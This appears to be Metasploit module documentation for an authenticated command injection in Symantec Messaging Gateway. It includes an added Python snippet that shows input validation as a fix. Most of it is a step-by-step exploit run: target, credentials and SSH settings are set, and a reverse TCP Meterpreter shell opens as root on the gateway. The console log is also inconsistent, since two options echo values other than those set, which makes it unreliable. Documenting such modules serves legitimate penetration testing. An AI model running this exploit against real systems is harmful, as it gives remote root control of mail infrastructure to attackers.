Vulnerable Application
This module exploits a command injection vulnerability in the Symantec Messaging Gateway product. An authenticated user can execute terminal commands in the context of the web server user, which is root.
The backupNow.do endpoint takes several user inputs and passes them to the internal service responsible for executing operating system commands. One of these inputs is passed to the service without proper validation, which causes a command injection vulnerability. However, the given parameters, such as the SSH IP address, port and credentials, are validated before the terminal command is executed. Thus, you need to configure your own SSH service and set the required parameters during module usage.
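The fix for this class of bug, as an added example that is not Symantec's code or part of the module: every field of the backup request is checked against an allow-list, and the command is built as an argument vector so that no shell ever parses user input. The field names, the archive path and the use of scp are assumptions; the page does not name the endpoint's parameters or the internal command.

```python
import ipaddress
import re

# Hypothetical field names and formats; the page does not name the parameters.
_SAFE_USER = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
_SAFE_PATH = re.compile(r"/[A-Za-z0-9._/-]{1,255}")


class InvalidBackupRequest(ValueError):
    """Raised when any field of the backup request fails validation."""


def validate_backup_request(form):
    """Validate every field, not only those used to open the SSH session."""
    try:
        host = str(ipaddress.ip_address(form["host"]))
        port = int(form["port"])
    except (KeyError, ValueError) as exc:
        raise InvalidBackupRequest("host/port") from exc
    if not 1 <= port <= 65535:
        raise InvalidBackupRequest("port")
    user = form.get("user", "")
    path = form.get("path", "")
    if not _SAFE_USER.fullmatch(user):
        raise InvalidBackupRequest("user")
    # Allow-list the characters and refuse parent-directory components.
    if not _SAFE_PATH.fullmatch(path) or ".." in path.split("/"):
        raise InvalidBackupRequest("path")
    return {"host": host, "port": port, "user": user, "path": path}


def build_backup_argv(form, archive="/var/backups/latest.tar.gz"):
    """Return an argv list meant for subprocess.run(argv, shell=False)."""
    f = validate_backup_request(form)
    # "--" ends option parsing, so no field can be read as an scp option.
    return ["scp", "-P", str(f["port"]), "--", archive,
            f"{f['user']}@{f['host']}:{f['path']}"]
```
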
Vulnerable Application Installation Steps
Click on the "free trial" button at the following URL: https://www.symantec.com/products/messaging-security/messaging-gateway
You need to complete the registration in order to download the ISO file. The license file will be delivered to your e-mail address.
Verification Steps
A successful check of the exploit will look like this:
msf > use exploit/linux/http/symantec_messaging_gateway_exec
msf exploit(symantec_messaging_gateway_exec) > set RHOST 12.0.0.199
RHOST => 12.0.0.199
msf exploit(symantec_messaging_gateway_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set USERNAME admin
USERNAME => admin
msf exploit(symantec_messaging_gateway_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > set SSH_ADDRESS 12.0.0.15
SSH_ADDRESS => 127.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set SSH_USERNAME root
SSH_USERNAME => root
msf exploit(symantec_messaging_gateway_exec) > set SSH_PASSWORD toor
SSH_PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > run
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:qwe123
[*] Capturing CSRF token
[+] CSRF token is : 48f39f735f15fcaccd0aacc40b27a67bf76f2bb1
[*] Sending stage (39842 bytes) to 12.0.0.199
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.199:53018) at 2017-04-30 14:00:12 +0300
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : hacker.dev
OS : Linux 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >